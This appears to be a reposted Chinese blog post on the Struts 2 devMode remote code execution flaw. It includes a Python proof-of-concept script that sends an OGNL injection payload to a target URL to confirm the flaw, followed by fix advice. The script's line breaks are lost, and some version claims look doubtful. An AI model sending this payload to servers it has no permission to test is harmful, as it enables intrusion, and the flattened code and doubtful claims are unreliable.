博客
关于我
Struts2 devMode远程代码执行漏洞检测利用
阅读量:179 次
发布时间:2019-02-28

本文共 2109 字,大约阅读时间需要 7 分钟。

Apache Struts 2 devMode漏洞详解

Apache Struts 2 是 Java 开发中广泛使用的 Web 服务器框架之一。然而,Struts 2 的 devMode 模式可能引发严重的安全漏洞,尤其是在未授权的情况下,可能导致远程代码执行,影响服务器安全。

devMode 模式简介

devMode 模式是为 Struts 2 开发人员设计的调试工具,允许开发者查看日志、配置信息等内容。默认情况下,devMode 是关闭的,但许多项目在上线时仍选择保留该模式开启,导致潜在安全隐患。

漏洞影响范围

该漏洞影响 Struts 2.1.0 到 2.5.1 版本,几乎涵盖了 Struts 2 的所有版本。如果 Struts 2 的 WebService 配置了最高权限,攻击者可以执行任意命令,包括关机、创建用户或删除服务器文件等危险操作。

漏洞检测

为了检测漏洞,开发者可以使用以下 POC 脚本:

#!/usr/bin/env python#coding:utf-8 -*-import sysimport getoptimport urllibimport urllib2poc = "debug=command&expression=(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter())!%3D(%23wr.println(%23parameters.content%5B0%5D))!%3D(%23wr.flush())!%3D(%23wr.close())&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=Adlabgsrc"banner = '''# S2-devMode 漏洞检测工具# 修复建议:立即关闭 devMode 模式# 使用方法:运行脚本并指定目标 URL,例如:python s2-devmode.py -u http://localhost:8080/orders/3/xxx帮助信息:python s2-devmode.py -h'''def usage():    print(banner)def send_poc(geturl, data):    try:        user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'        headers = {'User-Agent': user_agent, 'Cookie': ''}        req = urllib2.Request(geturl + "?" + data, headers=headers)        response = urllib2.urlopen(req)        content = response.read()        if "Adlabgsrc" in content:            print("该网站存在 S2-devMode 漏洞,建议立即修复。")            return True        else:            print("该网站安全。")            return False    except urllib2.URLError:        pass    return Falsedef check_vul(url):    if url.find("http://") != -1 or url.find("https://") != -1:        send_poc(url, poc)    else:        print("请提供有效的 URL。")if __name__ == '__main__':    opts, args = getopt.getopt(sys.argv[1:], "hu:o:")    for op, value in opts:        if op == "-u":            target_url = value            check_vul(target_url)        elif op == "-h":            usage()

工具检测

运行上述脚本可检测漏洞。脚本会尝试访问指定 URL,检测是否存在 devMode 漏洞。

修复方案

  • 关闭 devMode:在 struts.xml 中设置 devMode="false"

  • 升级 Struts 版本:升级到 Struts 2.6 或更高版本,这些版本已修复相关漏洞。

  • 谨慎管理权限:确保 WebService 没有最高权限,减少潜在攻击面。

  • 定期检查:定期运行漏洞检测工具,确保系统安全。

  • 通过以上措施,可以有效防范 Struts 2 devMode 漏洞,保障应用程序安全。

    转载地址:http://gegc.baihongyu.com/

    你可能感兴趣的文章
    Objective-C实现AC算法(Aho-Corasick) 算法(附完整源码)
    查看>>
    Objective-C实现adaboost算法(附完整源码)
    查看>>
    Objective-C实现Adler32算法(附完整源码)
    查看>>
    Objective-C实现AES算法(附完整源码)
    查看>>
    Objective-C实现AffineCipher仿射密码算法(附完整源码)
    查看>>
    Objective-C实现aliquot sum等分求和算法(附完整源码)
    查看>>
    Objective-C实现all combinations所有组合算法(附完整源码)
    查看>>
    Objective-C实现all permutations所有排列算法(附完整源码)
    查看>>
    Objective-C实现all subsequences所有子序列算法(附完整源码)
    查看>>
    Objective-C实现AlphaNumericalSort字母数字排序算法(附完整源码)
    查看>>
    Objective-C实现alternate disjoint set不相交集算法(附完整源码)
    查看>>
    Objective-C实现alternative list arrange备选列表排列算法(附完整源码)
    查看>>
    Objective-C实现An Armstrong number阿姆斯特朗数算法(附完整源码)
    查看>>
    Objective-C实现anagrams字谜算法(附完整源码)
    查看>>
    Objective-C实现ApproximationMonteCarlo蒙特卡洛方法计算pi值算法 (附完整源码)
    查看>>
    Objective-C实现area under curve曲线下面积算法(附完整源码)
    查看>>
    Objective-C实现argmax函数功能(附完整源码)
    查看>>
    Objective-C实现arithmetic算术算法(附完整源码)
    查看>>
    Objective-C实现armstrong numbers阿姆斯壮数算法(附完整源码)
    查看>>
    Objective-C实现articulation-points(关键点)(割点)算法(附完整源码)
    查看>>